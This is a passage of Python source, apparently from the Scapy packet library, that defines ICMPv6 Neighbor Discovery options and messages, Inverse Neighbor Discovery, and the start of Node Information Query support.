        """Keep the first 4 bytes of ``s`` as payload, the rest as padding."""
        return s[:4], s[4:]
1704
1705
1706# ICMPv6 Neighbor Discovery (RFC 2461) #
1707
# Neighbor Discovery option type -> display name
icmp6ndopts = {1: "Source Link-Layer Address",
               2: "Target Link-Layer Address",
               3: "Prefix Information",
               4: "Redirected Header",
               5: "MTU",
               6: "NBMA Shortcut Limit Option",  # RFC2491
               7: "Advertisement Interval Option",
               8: "Home Agent Information Option",
               9: "Source Address List",
               10: "Target Address List",
               11: "CGA Option",            # RFC 3971
               12: "RSA Signature Option",  # RFC 3971
               13: "Timestamp Option",      # RFC 3971
               14: "Nonce option",          # RFC 3971
               15: "Trust Anchor Option",   # RFC 3971
               16: "Certificate Option",    # RFC 3971
               17: "IP Address Option",                             # RFC 4068
               18: "New Router Prefix Information Option",          # RFC 4068
               19: "Link-layer Address Option",                     # RFC 4068
               20: "Neighbor Advertisement Acknowledgement Option",
               21: "CARD Request Option",  # RFC 4065/4066/4067
               22: "CARD Reply Option",   # RFC 4065/4066/4067
               23: "MAP Option",          # RFC 4140
               24: "Route Information Option",  # RFC 4191
               25: "Recursive DNS Server Option",
               26: "IPv6 Router Advertisement Flags Option"
               }
1735
# Neighbor Discovery option type -> name of the class implementing the
# option. Values are class names given as strings; this table is the one
# looked up by _ICMPv6NDGuessPayload.guess_payload_class().
icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
                  2: "ICMPv6NDOptDstLLAddr",
                  3: "ICMPv6NDOptPrefixInfo",
                  4: "ICMPv6NDOptRedirectedHdr",
                  5: "ICMPv6NDOptMTU",
                  6: "ICMPv6NDOptShortcutLimit",
                  7: "ICMPv6NDOptAdvInterval",
                  8: "ICMPv6NDOptHAInfo",
                  9: "ICMPv6NDOptSrcAddrList",
                  10: "ICMPv6NDOptTgtAddrList",
                  # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
                  # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
                  # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
                  # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
                  # 15: Do Me,
                  # 16: Do Me,
                  17: "ICMPv6NDOptIPAddr",
                  18: "ICMPv6NDOptNewRtrPrefix",
                  19: "ICMPv6NDOptLLA",
                  # 20: Do Me,
                  # 21: Do Me,
                  # 22: Do Me,
                  23: "ICMPv6NDOptMAP",
                  24: "ICMPv6NDOptRouteInfo",
                  25: "ICMPv6NDOptRDNSS",
                  26: "ICMPv6NDOptEFA",
                  31: "ICMPv6NDOptDNSSL",
                  37: "ICMPv6NDOptCaptivePortal",
                  38: "ICMPv6NDOptPREF64",
                  }
1768
# Values of the 2-bit router preference field -> display name
icmp6ndraprefs = {0: "Medium (default)",
                  1: "High",
                  2: "Reserved",
                  3: "Low"}  # RFC 4191
1773
1774
class _ICMPv6NDGuessPayload:
    """Mixin selecting the class of the next Neighbor Discovery option."""
    name = "Dummy ND class that implements guess_payload_class()"

    def guess_payload_class(self, p):
        """Return the entry of icmp6ndoptscls matching the first byte of p.

        ICMPv6NDOptUnknown is returned for an option type that is not in
        the table, and None when ``p`` holds less than two bytes.
        """
        if len(p) <= 1:
            return None
        option_type = orb(p[0])
        return icmp6ndoptscls.get(option_type, ICMPv6NDOptUnknown)
1781
1782
1783# Beginning of ICMPv6 Neighbor Discovery Options.
1784
class ICMPv6NDOptDataField(StrLenField):
    """Data of a Neighbor Discovery option, zero padded when built.

    The value is padded so that its length plus 2 is a multiple of 8.
    With ``strip_zeros`` set, trailing zero bytes are removed on dissection.
    """
    __slots__ = ["strip_zeros"]

    def __init__(self, name, default, strip_zeros=False, **kwargs):
        super().__init__(name, default, **kwargs)
        self.strip_zeros = strip_zeros

    def i2len(self, pkt, x):
        """Return the length of the value once padded."""
        padded = self.i2m(pkt, x)
        return len(padded)

    def i2m(self, pkt, x):
        """Return ``x`` followed by the zero bytes needed for alignment."""
        # The 2 extra bytes are added to the data length before aligning
        overflow = (len(x) + 2) % 8
        if overflow == 0:
            return x
        return x + b"\x00" * (8 - overflow)

    def m2i(self, pkt, x):
        """Return ``x``, without its trailing zeros if strip_zeros is set."""
        return x.rstrip(b"\x00") if self.strip_zeros else x
1805
1806
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery option without a dedicated class.

    "len" counts units of 8 bytes, type and len bytes included; it is
    derived from "data" when left to None.
    """
    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [ByteField("type", 0),
                   FieldLenField("len", None, length_of="data", fmt="B",
                                 adjust=lambda pkt, x: (2 + x) // 8),
                   # max() makes a len of 0 read as a single 8-byte unit
                   ICMPv6NDOptDataField("data", "", strip_zeros=False,
                                        length_from=lambda pkt:
                                        8 * max(pkt.len, 1) - 2)]
1815
1816# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revisit the use of ETHER_ANY
1818
1819
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    """Source Link-Layer Address option (type 1) holding a MAC address."""
    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [ByteField("type", 1),
                   ByteField("len", 1),
                   MACField("lladdr", ETHER_ANY)]

    def mysummary(self):
        """Return a one-line summary showing the link-layer address."""
        return self.sprintf("%name% %lladdr%")
1828
1829
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    """Link-layer address option of type 2, same layout as type 1."""
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    type = 2
1833
1834
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    """Prefix Information option (type 3).

    Defaults: a /64 prefix with the L and A flags set, and both lifetimes
    set to 0xffffffff.
    """
    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [ByteField("type", 3),
                   ByteField("len", 4),
                   ByteField("prefixlen", 64),
                   BitField("L", 1, 1),
                   BitField("A", 1, 1),
                   BitField("R", 0, 1),
                   BitField("res1", 0, 5),
                   XIntField("validlifetime", 0xffffffff),
                   XIntField("preferredlifetime", 0xffffffff),
                   XIntField("res2", 0x00000000),
                   IP6Field("prefix", "::")]

    def mysummary(self):
        """Return a one-line summary: prefix, its length and the flags."""
        return self.sprintf("%name% %prefix%/%prefixlen% "
                            "On-link %L% Autonomous Address %A% "
                            "Router Address %R%")
1853
1854# TODO: We should also limit the size of included packet to something
1855# like (initiallen - 40 - 2)
1856
1857
class TruncPktLenField(PacketLenField):
    """PacketLenField whose built value is cut to a multiple of 8 bytes."""

    def i2m(self, pkt, x):
        """Return the bytes of ``x`` without the trailing partial unit."""
        built = bytes(x)
        whole_units = len(built) // 8
        return built[:8 * whole_units]

    def i2len(self, pkt, i):
        """Return the length of the truncated value."""
        truncated = self.i2m(pkt, i)
        return len(truncated)
1866
1867
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    """Redirected Header option (type 4) embedding an IPv6 packet.

    "len" counts units of 8 bytes; the 8 bytes before "pkt" (type, len and
    "res") are included.
    """
    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [ByteField("type", 4),
                   FieldLenField("len", None, length_of="pkt", fmt="B",
                                 adjust=lambda pkt, x: (x + 8) // 8),
                   MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
                   TruncPktLenField("pkt", b"", IPv6,
                                    length_from=lambda pkt: 8 * pkt.len - 8)]
1876
1877# See which value should be used for default MTU instead of 1280
1878
1879
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    """MTU option (type 5); "mtu" defaults to 1280."""
    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [ByteField("type", 5),
                   ByteField("len", 1),
                   XShortField("res", 0),
                   IntField("mtu", 1280)]

    def mysummary(self):
        """Return a one-line summary showing the MTU."""
        return self.sprintf("%name% %mtu%")
1889
1890
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
    """NBMA Shortcut Limit option (type 6)."""
    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [ByteField("type", 6),
                   ByteField("len", 1),
                   ByteField("shortcutlim", 40),  # XXX
                   ByteField("res1", 0),
                   IntField("res2", 0)]
1898
1899
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    """Advertisement Interval option (type 7)."""
    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [ByteField("type", 7),
                   ByteField("len", 1),
                   ShortField("res", 0),
                   IntField("advint", 0)]

    def mysummary(self):
        """Return a one-line summary showing the interval."""
        return self.sprintf("%name% %advint% milliseconds")
1909
1910
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    """Home Agent Information option (type 8)."""
    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [ByteField("type", 8),
                   ByteField("len", 1),
                   ShortField("res", 0),
                   ShortField("pref", 0),
                   ShortField("lifetime", 1)]

    def mysummary(self):
        """Return a one-line summary: preference and lifetime."""
        return self.sprintf("%name% %pref% %lifetime% seconds")
1921
1922# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1923
1924# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1925
1926
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """IP Address option (type 17) holding one IPv6 address."""
    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [ByteField("type", 17),
                   ByteField("len", 3),
                   ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
                                                2: "New Care-Of Address",
                                                3: "NAR's IP address"}),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("addr", "::")]
1937
1938
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """New Router Prefix Information option (type 18)."""
    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 18),
                   ByteField("len", 3),
                   ByteField("optcode", 0),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("prefix", "::")]
1947
1948
# Display names of the "optcode" values of the RFC 4068 Link-Layer Address
# option (ICMPv6NDOptLLA)
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
                        1: "LLA for the new AP",
                        2: "LLA of the MN",
                        3: "LLA of the NAR",
                        4: "LLA of the src of TrSolPr or PrRtAdv msg",
                        5: "AP identified by LLA belongs to current iface of router",  # noqa: E501
                        6: "No prefix info available for AP identified by the LLA",  # noqa: E501
                        7: "No fast handovers support for AP identified by the LLA"}  # noqa: E501
1957
1958
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """Link-Layer Address option (type 19): option code and MAC address."""
    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 19),
                   ByteField("len", 1),
                   ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
                   MACField("lla", ETHER_ANY)]  # We only support ethernet
1965
1966
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):  # RFC 4140
    """MAP option (type 23).

    "dist", "pref", "R" and "res" share two bytes (4 + 4 + 1 + 7 bits).
    """
    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [ByteField("type", 23),
                   ByteField("len", 3),
                   BitField("dist", 1, 4),
                   BitField("pref", 15, 4),  # highest availability
                   BitField("R", 1, 1),
                   BitField("res", 0, 7),
                   IntField("validlifetime", 0xffffffff),
                   IP6Field("addr", "::")]
1977
1978
class _IP6PrefixField(IP6Field):
    """IPv6 prefix whose size on the wire depends on the "len" of the packet.

    The prefix takes ``8 * (len - 1)`` bytes: nothing when len is 0 or 1,
    8 or 16 bytes when len is 2 or 3, and the 16 address bytes followed by
    zero bytes for bigger values.
    """
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        # Number of prefix bytes announced by the "len" field of the packet
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        """Append the machine form of ``val`` to ``s``."""
        encoded = self.i2m(pkt, val)
        return s + encoded

    def getfield(self, pkt, s):
        """Read the prefix from ``s`` and return (remaining bytes, value)."""
        size = self.length_from(pkt)
        raw_prefix = s[:size]
        if size < 16:
            # Complete a short prefix with zeros up to a full address
            raw_prefix = raw_prefix + b'\x00' * (16 - size)
        return s[size:], self.m2i(pkt, raw_prefix)

    def i2len(self, pkt, x):
        """Return the size of the prefix as it is built."""
        encoded = self.i2m(pkt, x)
        return len(encoded)

    def i2m(self, pkt, x):
        """Return the prefix bytes, sized according to ``pkt.len``.

        A None value is built as "::", and yields no byte at all when
        ``pkt.len`` is None as well.
        """
        units = pkt.len

        if x is None:
            x = "::"
            if units is None:
                units = 1

        # Always convert, even when the result ends up unused
        packed = inet_pton(socket.AF_INET6, x)

        if units is None:
            return packed
        if units in (0, 1):
            return b""
        if units in (2, 3):
            return packed[:8 * (units - 1)]
        return packed + b'\x00' * 8 * (units - 3)
2016
2017
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
    """Neighbor Discovery Route Information option, option type 24.

    When "len" is None it is derived at build time from the encoded size
    of "prefix" (size // 8 + 1).
    """
    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [ByteField("type", 24),
                   FieldLenField("len", None, length_of="prefix", fmt="B",
                                 adjust=lambda pkt, x: x // 8 + 1),
                   ByteField("plen", None),
                   # One byte: 3 reserved bits, 2-bit preference, 3 reserved bits
                   BitField("res1", 0, 3),
                   BitEnumField("prf", 0, 2, icmp6ndraprefs),
                   BitField("res2", 0, 3),
                   IntField("rtlifetime", 0xffffffff),
                   _IP6PrefixField("prefix", None)]

    def mysummary(self):
        """Return a one-line summary with prefix, prefix length and preference."""
        return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
2032
2033
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
    """Neighbor Discovery Recursive DNS Server option, option type 25.

    When "len" is None it is computed from the number of entries in "dns"
    (2 * count + 1); at dissection, the address list spans
    8 * (len - 1) bytes.
    """
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [ByteField("type", 25),
                   FieldLenField("len", None, count_of="dns", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   IP6ListField("dns", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]

    def mysummary(self):
        """Return the option name followed by the comma-separated servers."""
        return self.sprintf("%name% ") + ", ".join(self.dns)
2046
2047
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
    """Neighbor Discovery Expanded Flags option, option type 26.

    The 48 bits following type and len are exposed as one "res" bit field.
    """
    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [ByteField("type", 26),
                   ByteField("len", 1),
                   BitField("res", 0, 48)]
2053
2054# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2055# described in section 3.1 of RFC 1035
2056# XXX Label should be at most 63 octets in length : we do not enforce it
2057# Total length of domain should be 255 : we do not enforce it either
2058
2059
class DomainNameListField(StrLenField):
    """List of domain names encoded as length-prefixed labels (RFC 1035, 3.1).

    Internal and human values are lists of str names. On the wire, each name
    is a sequence of <length byte><label bytes> items terminated by a null
    byte. When ``padded`` is true, the built string is zero-padded up to a
    multiple of ``padded_unit`` bytes and empty names found at dissection
    (i.e. the padding) are discarded.

    Label lengths are counted in bytes, both when building and when
    dissecting, so that labels holding non-ASCII (UTF-8) characters are
    handled consistently.
    """
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
        self.padded = padded
        StrLenField.__init__(self, name, default, length_from=length_from)

    def i2len(self, pkt, x):
        """Return the size in bytes of the encoded list."""
        return len(self.i2m(pkt, x))

    def i2h(self, pkt, x):
        """Return x, or an empty list when x is empty or None."""
        if not x:
            return []
        return x

    def m2i(self, pkt, x):
        """Decode the wire format into a list of dot-terminated names."""
        # Work on bytes: length prefixes are byte counts, so decoding the
        # whole buffer to text first would misplace label boundaries as
        # soon as a label holds a multi-byte character.
        x = bytes_encode(x)
        res = []
        while x:
            # Get a name until \x00 is reached
            cur = []
            while x and orb(x[0]) != 0:
                tmp_len = orb(x[0])
                cur.append(plain_str(x[1:tmp_len + 1]))
                x = x[tmp_len + 1:]
            # In padded mode, empty names are padding and are discarded;
            # otherwise every name (even empty) is stored
            if cur or not self.padded:
                res.append(".".join(cur) + ".")
            # Skip the null byte terminating the current name
            if x and orb(x[0]) == 0:
                x = x[1:]
        return res

    def i2m(self, pkt, x):
        """Encode the list of names x into the wire format."""
        def encode_name(name):
            # Encode each label first: the length byte must count bytes,
            # not characters
            labels = [label.encode("utf8") for label in name.split('.')]
            wire = b"".join(chb(len(label)) + label for label in labels)
            # A name ending with a dot already ends with an empty label
            # (\x00); otherwise add the terminating null byte
            if wire and orb(wire[-1]) == 0:
                return wire
            return wire + b'\x00'

        ret_string = b"".join(encode_name(name) for name in x)

        # In padded mode, add some \x00 bytes
        if self.padded and not len(ret_string) % self.padded_unit == 0:
            ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)  # noqa: E501

        return ret_string
2112
2113
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
    """Neighbor Discovery DNS Search List option, option type 31.

    When "len" is None it is computed from the encoded size of
    "searchlist" (1 + size // 8); at dissection the search list spans
    8 * len - 8 bytes. The list is built in padded mode.
    """
    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [ByteField("type", 31),
                   FieldLenField("len", None, length_of="searchlist", fmt="B",
                                 adjust=lambda pkt, x: 1 + x // 8),
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   DomainNameListField("searchlist", [],
                                       length_from=lambda pkt: 8 * pkt.len - 8,
                                       padded=True)
                   ]

    def mysummary(self):
        """Return the option name followed by the comma-separated domains."""
        return self.sprintf("%name% ") + ", ".join(self.searchlist)
2128
2129
class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet):  # RFC 8910
    """Neighbor Discovery Captive-Portal option, option type 37.

    When "len" is None it is computed from the size of "URI" as
    (2 + size) // 8. At dissection the URI spans 8 * max(len, 1) - 2
    bytes, so a "len" of 0 is handled like a "len" of 1.
    """
    name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
    fields_desc = [ByteField("type", 37),
                   FieldLenField("len", None, length_of="URI", fmt="B",
                                 adjust=lambda pkt, x: (2 + x) // 8),
                   ICMPv6NDOptDataField("URI", "", strip_zeros=True,
                                        length_from=lambda pkt:
                                        8 * max(pkt.len, 1) - 2)]

    def mysummary(self):
        """Return the option name followed by the URI."""
        return self.sprintf("%name% %URI%")
2141
2142
class _PREF64(IP6Field):
    """IPv6 address field that only carries 12 bytes on the wire."""

    def addfield(self, pkt, s, val):
        # Only the first 12 bytes of the packed address are emitted
        return s + self.i2m(pkt, val)[:12]

    def getfield(self, pkt, s):
        # Consume 12 bytes and complete them with 4 zero bytes for m2i()
        return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4)
2149
2150
class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet):  # RFC 8781
    """Neighbor Discovery PREF64 option, option type 38.

    "plc" indexes the list of prefix length labels ("/96" ... "/32");
    values of 6 and above have no label.
    """
    name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
    fields_desc = [ByteField("type", 38),
                   ByteField("len", 2),
                   # 13-bit scaled lifetime and 3-bit PLC share two bytes
                   BitField("scaledlifetime", 0, 13),
                   BitEnumField("plc", 0, 3,
                                ["/96", "/64", "/56", "/48", "/40", "/32"]),
                   _PREF64("prefix", "::")]

    def mysummary(self):
        """Return the option name and prefix followed by its length label."""
        # PLC values without a label are reported as invalid
        plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
        return self.sprintf("%name% %prefix%") + plc
2163
2164# End of ICMPv6 Neighbor Discovery Options.
2165
2166
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Router Solicitation message (type 133)."""
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [ByteEnumField("type", 133, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0)]
    # IPv6 field values overloaded when this layer sits on top of IPv6
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2174
2175
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Router Advertisement message (type 134).

    Considered an answer to any ICMPv6ND_RS.
    """
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [ByteEnumField("type", 134, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   ByteField("chlim", 0),
                   # The following six bit fields share a single byte
                   BitField("M", 0, 1),
                   BitField("O", 0, 1),
                   BitField("H", 0, 1),
                   BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
                   BitField("P", 0, 1),
                   BitField("res", 0, 2),
                   ShortField("routerlifetime", 1800),
                   IntField("reachabletime", 0),
                   IntField("retranstimer", 0)]
    # IPv6 field values overloaded when this layer sits on top of IPv6
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def answers(self, other):
        """Return True when other is a Router Solicitation."""
        return isinstance(other, ICMPv6ND_RS)

    def mysummary(self):
        """Return a one-line summary of lifetime, hop limit and flags."""
        return self.sprintf("%name% Lifetime %routerlifetime% "
                            "Hop Limit %chlim% Preference %prf% "
                            "Managed %M% Other %O% Home %H%")
2200
2201
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """ICMPv6 Neighbor Solicitation message (type 135)."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [ByteEnumField("type", 135, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0),
                   IP6Field("tgt", "::")]
    # IPv6 field values overloaded when this layer sits on top of IPv6
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        """Return the message name followed by the target address."""
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        """Return the target address bytes plus the payload hashret.

        ICMPv6ND_NA.hashret() is built the same way.
        """
        return bytes_encode(self.tgt) + self.payload.hashret()
2216
2217
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """ICMPv6 Neighbor Advertisement message (type 136).

    Answers an ICMPv6ND_NS carrying the same target address.
    """
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [ByteEnumField("type", 136, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   # Three 1-bit flags followed by 29 reserved bits
                   BitField("R", 1, 1),
                   BitField("S", 0, 1),
                   BitField("O", 1, 1),
                   XBitField("res", 0, 29),
                   IP6Field("tgt", "::")]
    # IPv6 field values overloaded when this layer sits on top of IPv6
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        """Return the message name followed by the target address."""
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        """Return the target address bytes plus the payload hashret."""
        return bytes_encode(self.tgt) + self.payload.hashret()

    def answers(self, other):
        """Return True when other is a Neighbor Solicitation for our target."""
        return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2238
2239# associated possible options : target link-layer option, Redirected header
2240
2241
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """ICMPv6 Redirect message (type 137) with target and destination."""
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [ByteEnumField("type", 137, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("res", 0),
                   IP6Field("tgt", "::"),
                   IP6Field("dst", "::")]
    # IPv6 field values overloaded when this layer sits on top of IPv6
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2251
2252
2253# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
2254
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    """Inverse Neighbor Discovery Source Address List option, type 9.

    When "len" is None it is computed from the number of entries in
    "addrlist" (2 * count + 1); at dissection the list spans
    8 * (len - 1) bytes.
    """
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [ByteField("type", 9),
                   FieldLenField("len", None, count_of="addrlist", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   # 6 reserved bytes, zeroed by default
                   StrFixedLenField("res", b"\x00" * 6, 6),
                   IP6ListField("addrlist", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]
2263
2264
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    """Target Address List option: same layout as the source list, type 10."""
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10
2268
2269
2270# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be good to take the L2 address
#   requested in the required target lladdr option and use it as the
#   Ethernet destination address if no address is specified
# - this does not seem very practical if the user has to specify all
#   the options.
2278# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Inverse Neighbor Discovery Solicitation message (type 141)."""
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [ByteEnumField("type", 141, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    # IPv6 field values overloaded when this layer sits on top of IPv6
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2286
# Required options: target lladdr, target address list
# Other valid options: MTU
2289
2290
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Inverse Neighbor Discovery Advertisement message (type 142)."""
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [ByteEnumField("type", 142, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    # IPv6 field values overloaded when this layer sits on top of IPv6
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2298
2299
2300###############################################################################
2301# ICMPv6 Node Information Queries (RFC 4620)
2302###############################################################################
2303
2304# [ ] Add automatic destination address computation using computeNIGroupAddr
2305# in IPv6 class (Scapy6 modification when integrated) if :
2306# - it is not provided
2307# - upper layer is ICMPv6NIQueryName() with a valid value
2308# [ ] Try to be liberal in what we accept as internal values for _explicit_
2309# DNS elements provided by users. Any string should be considered
2310# valid and kept like it has been provided. At the moment, i2repr() will
2311# crash on many inputs
2312# [ ] Do the documentation
2313# [ ] Add regression tests
2314# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
2315# [ ] Check if there are differences between different stacks. Among *BSD,
2316# with others.
2317# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). It should be possible to disable it.
2320
# Node Information Qtype values and their display names, used by the
# "qtype" field of the NI query and reply classes
icmp6_niqtypes = {0: "NOOP",
                  2: "Node Name",
                  3: "IPv6 Address",
                  4: "IPv4 Address"}
2325
2326
class _ICMPv6NIHashret:
    """Mixin providing a hashret() based on the "nonce" attribute."""

    def hashret(self):
        # Only the nonce is used; the payload is not taken into account
        return bytes_encode(self.nonce)
2330
2331
class _ICMPv6NIAnswers:
    """Mixin matching a Node Information reply to a query by nonce."""

    def answers(self, other):
        """Tell whether ``other`` carries the same nonce as this packet."""
        mine = self.nonce
        theirs = other.nonce
        return mine == theirs
2335
2336# Buggy; always returns the same value during a session
2337
2338
class NonceField(StrFixedLenField):
    """Fixed-length (8 bytes) string field used for the NI nonce.

    When no default is provided, the field default is set once, at field
    creation time, to the result of self.randval().
    """

    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is None:
            # Evaluated a single time, when the field object is created
            self.default = self.randval()
2344
2345
@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first label of the lowercased name is used. It is prefixed
    with its length, hashed with MD5, and the first 4 bytes of the digest
    provide the last 32 bits of the returned address.

    :param name: node name or FQDN (str)
    :return: the address, as a "ff02::2:xxxx:xxxx" string
    """
    name = name.lower().split(".")[0]
    record = chr(len(name)) + name
    digest = md5(record.encode("utf8")).digest()
    # Every byte must be rendered as two zero-padded hex digits: "%2x" pads
    # with spaces, which produces an invalid address for bytes below 0x10
    return "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", digest[:4])
2355
2356
2357# Here is the deal. First, that protocol is a piece of shit. Then, we
2358# provide 4 classes for the different kinds of Requests (one for every
2359# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2360# data field class that is made to be smart by guessing the specific
2361# type of value provided :
2362#
2363# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2364# if not overridden by user
